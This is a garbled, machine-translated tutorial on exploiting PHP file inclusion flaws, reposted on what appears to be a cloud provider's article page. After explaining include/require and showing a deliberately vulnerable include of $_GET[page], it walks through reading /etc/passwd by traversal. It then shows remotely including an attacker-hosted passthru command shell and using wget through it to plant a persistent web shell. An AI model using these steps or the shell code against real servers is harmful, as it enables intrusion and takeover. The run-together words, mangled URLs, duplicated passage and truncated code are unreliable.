Principles and usage of PHP file inclusion Vulnerabilities

Source: Internet
Author: User

I. involved dangerous functions (include (), require () and include_once (), require_once ()〕

Include () & require () Statement: includes and runs the specified file.

These two structures are identical except for how to handle failures. Include () generates a warning and require () causes a fatal error. In other words, if you want to stop processing the page when a file is lost, use require (). This is not the case with include (). The script will continue to run.

If "allow_url_fopen" is activated in PHP (configured by default), you can also use URL (through HTTP or other supported encapsulation protocols) instead of local files to specify the files to be included. If the target server interprets the target file as PHP code, you can use the URL request string applicable to HTTPGET to pass variables to the included file.


Require_once () & amp; include_once ()

The require_once () and include_once () statements include and run the specified file during script execution. This behavior is similar to the require () statement. The only difference is that if the code in the file has been included, it will not be included again. It is applicable to situations where the same file may be included more than once during script execution. You want to ensure that it is included only once to avoid function redefinition and variable re-assignment.


Ii. Why file inclusion?

When programmers write programs, they do not like to do the same thing or write the same code (such as some common functions) several times, therefore, the public code is written in a separate file, such as share. php, and then include the call in other files. In php, we use the functions listed above to achieve this goal. The workflow is as follows. php contains share. php, I will write include ("share. php ") to achieve the goal, and then you can use share. php functions, such as the name of the file that needs to be written to death, have no problems or vulnerabilities. So what exactly is the problem?

Sometimes you may not be sure which file to include. For example, let's look at the index. php code of the file below:

CODE: [Copytoclipboard]


If ($ _ GET [page]) {include $ _ GET [page];} else {include "home. php ";} is a normal piece of PHP code. How does it work? This involves the meaning of $ _ GET, so I won't talk about it (or I can write an HTTP Article). If you still don't know GET, POST, and so on, then you need to make up some relevant information on Google.

The format of the above Code may be: php? Page = main. php or a php? Page = downloads. php:

1. Submit the URL above and obtain the value of this page in index. php ($ _ GET [page]).

2. Check whether $ _ GET [page] is empty. If it is not empty (main. php here), use include to include this file.

3. If $ _ GET [page] is empty, run else to restore the dehome. php file.

Iii. Why are vulnerabilities discovered?

You may want to say that this is good. It is very convenient to dynamically include files according to URLs. How can this cause a vulnerability? The answer to the question is: we are not clever, we always like to be different from others, we will not follow his link to operate, we may want to write their own files to contain (CALL, for example, we will enter the following URL: Page = hello. php. Then our index. the php program is silly and follows the steps above to execute: Get page as hello. php, and then go to include (hello. php), then the problem occurs, because we do not have hello. php file, so it will report a warning when it is included, similar to the following information:


Warning: include (hello. php) [function. include]: failedtoopenstream: Nosuchfileordirectoryin/vhost/wwwroot/php/index. phponline3 Warning: include () [function. include]: Failedopeninghello. phpforinclusion (include_path =. :) in/vhost/wwwroot/php/index. phponline3 note that the above Warning cannot find the specified hello. the PHP file, that is, the file that does not contain the specified path. The following warning is that the specified file is not found before, so a warning is given when the file is included.

Iv. How to Use

As we can see above, there is a problem, so how can we use such a vulnerability? There are actually a lot of exploitation methods, but they are essentially similar. Here I will talk about three common exploitation methods:

1. Including reading other files on the target machine

As we can see above, because the obtained parameter page is not filtered, We can randomly specify other sensitive files on the target host, such as in the previous warning, we can see the exposed absolute path (vhost/wwwroot/php/), then we can multiple probes to include other files, such as specifying the URL as: Page =. /txt.txtcan be used to read the TXT file from the current directory .. /.. /perform directory jump (without filtering .. /). You can also directly specify an absolute path to read sensitive system files, such as the URL: http: // Page =/etc/passwd. If the target host does not have strict permission restrictions, or the Apache startup permission is relatively high, you can read the content of this file. Otherwise, a Warning similar to open_basedirrestrictionineffect. will be obtained.

2. Include a runable PHP Trojan

If the target host's "allow_url_fopen" suffix (the suffix is not important, as long as the content is in PHP format ).

If (get_magic_quotes_gpc () {$ _ REQUEST ["cmd"] = stripslashes ($ _ REQUEST ["cmd"]);} // remove the Escape Character (the backslash character in the string can be removed) ini_set ("max_execution_time", 0); // set the execution time for this file. 0 is unlimited. echo "1. s.T "; summary of this article: // print the returned start line message passthru ($ _ REQUEST [" cmd "]); // run the command echo" 1 specified by cmd. s.T "; // The returned end row prompt?> The purpose of the above file is to accept the command specified by cmd and call the passthru function for execution to return the content between 1. S.T. Save this file to the server on our host (it can be a host that does not support PHP), as long as it can be accessed through HTTP.

// Print the returned start message passthru ($ _ REQUEST ["cmd"]); // run the command echo "1. s.T "; // The returned end row prompt?> The purpose of the above file is to accept the command specified by cmd and call the passthru function for execution to return the content between 1. S.T. Save this file to the server on our host (it can be a host that does not support PHP), as long as it can be accessed through HTTP. For example, the address is as follows: assets // Page = Cmd = ls. cmd is followed by the command you need to execute. Other commonly used commands (take * UNIX as an example) are as follows:


Ll column directory and file (equivalent to dir in Windows)

Pwd to view the current absolute path

View Current user in idwhoami

Wget downloads the file of the specified URL

Wait for others. Go to BAIDU to find the host.

The above method is to get a Webshell (although this PHP file is not on the target machine, it is indeed a Webshell, isn't it? Haha)

3. a PHP file containing the created File

Some people may think that it is more reassuring to get a real Webshell on the target machine. If someone finds that the vulnerability is fixed, we can no longer remotely include the "pseudo" Webshell above, right? We can understand this mentality. Let's continue. To get a real Webshell, we also talk about two common methods:

1) use commands such as wget to download a Webshell

This is simple and often used. In the pseudo webshell we obtained above, we can execute commands, so we can also call a very powerful role in the system, wget, this command is powerful. You can use google to get a lot of parameters, and it will definitely confuse you. Haha, we don't need to be so complicated. We will use a-O (-- output-document = FILE, write the document to the FILE.

The premise is that you put a Webshell containing PHP code in a place that can be accessed through HTTP or FTP, such as the content of webshellis written in this file. Then we execute the following URL: Page = http: // Cmd = wgethttp: // php. If the current directory is writable, you can get a file named 1stphp. php Webshell. If the current directory cannot be written, you need to find another method.

2) use files to create

The previous wget may encounter a situation where the current directory cannot be written; or the command is disabled (or not installed) on the target host, and we need to modify it again, we can combine the previous File Inclusion Vulnerability to include a PHP script for creating a file (writing a file). The content is as follows:

$ F = file_get_contents (" ";);/

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.